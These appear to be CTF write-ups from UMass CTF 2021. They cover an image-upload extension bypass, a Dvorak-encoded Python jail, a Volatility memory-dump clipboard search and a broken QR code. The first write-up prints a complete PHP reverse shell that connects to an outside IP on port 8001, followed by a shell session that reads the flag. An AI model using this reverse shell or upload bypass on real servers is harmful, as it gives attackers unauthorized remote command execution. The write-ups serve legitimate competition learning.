Author: goproslowyo
This box was a simple extension filter bypass to gain a shell and get the flag.
netcat
listener on 8001
..png
worked fine.0YE8gg
and a link (http://34.121.84.161:8086/show.php?filename=0YE8gg
) to view it.From here we can explore the server and get the flag.
hermit@aec9a5b5ef1d:/$ ls /home/hermit
ls /home/hermit
userflag.txt
hermit@aec9a5b5ef1d:/$ cat /home/hermit/userflag.txt
cat /home/hermit/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit(0);
$VERSION = "1.0";
$ip = '34.251.165.208';
$port = 8001;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; whoami; /bin/bash -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Author: goproslowyo
This challenge starts off with text encoded in dvorak. Converting it we find a jail we need to break out of.
We’re given an IP and port to connect to 34.72.64.224
and 8083
. Upon connecting we find a strange code:
$ nc 34.72.64.224 8083
Frg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw
row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -ekrpat-v Frg ,cnn yd.b i.y abryd.p
cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv
This is the Dvorak keyboard layout so let’s decode it to:
You've broken my code! Escape without the help of eval, exec, import, open,
os, read, system, and write. First, enter 'dvorak'. You will then get another
input which you can use try to break out of the jail.
Solved By: OreoByte
Author: goproslowyo
We’re given a memory dump to analyze. Inside we find a base64 encoded string on the users clipboard containing the flag.
Downloaded image.mem
for the challenge.
root@ip-10-10-162-135:~/repos# curl -LO http://static.ctf.umasscybersec.org/forensics/13096721-bb26-4b79-956f-3f0cddebd49b/image.mem
imageinfo
command can help to identify the correct profile to use later with the --profile=[profile]
argument. From the output it seems like it’s a Windows 7 Service Pack 1
memory dump.grep -vi 'fail'
(we we’re removing some error out from python modules with that). root@ip-10-10-162-135:~/repos# vol.py -f image.mem imageinfo | grep -vi 'fail'
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/root/repos/image.mem)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80002a3b0a0L
Number of Processors : 6
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff80002a3cd00L
KPCR for CPU 1 : 0xfffff880009f1000L
KPCR for CPU 2 : 0xfffff88002ea9000L
KPCR for CPU 3 : 0xfffff88002f1f000L
KPCR for CPU 4 : 0xfffff88002f95000L
KPCR for CPU 5 : 0xfffff88002fcb000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2021-03-20 18:16:12 UTC+0000
Image local date and time : 2021-03-20 13:16:12 -0500
Hidden in the users clipboard memory dump we find a base64 encoded string.
root@ip-10-10-162-135:~/repos# vol.py -f image.mem --profile=Win7SP1x64 clipboard
Volatility Foundation Volatility Framework 2.6.1
Session WindowStation Format Handle Object Data
---------- ------------- ------------------ ------------------ ------------------ --------------------------------------------------
1 WinSta0 CF_UNICODETEXT 0x5a00b5 0xfffff900c26aeb60 VU1BU1N7JDNDVVIzXyQ3MFJhZzN9Cg==
1 WinSta0 CF_TEXT 0x64006e00000010 ------------------
1 WinSta0 0x13c01b7L 0x0 ------------------
1 WinSta0 CF_TEXT 0x1 ------------------
1 ------------- ------------------ 0x13c01b7 0xfffff900c06fa270
Decode the string:
root@ip-10-10-162-135:~/repos# echo VU1BU1N7JDNDVVIzXyQ3MFJhZzN9Cg== | base64 -d
UMASS{$3CUR3_$70Rag3}
Solved by: goproslowyo
Author: goproslowyo
This challenge was a broken QR code needed to be recreated to be read.
xcf
file which is a GIMP project file.
http://static.ctf.umasscybersec.org/misc/8e0111c9-d8d0-4518-973d-dbdcbd9d5a42/scan_me.xcf
UMASS{RQ-3Z-m0d3}
.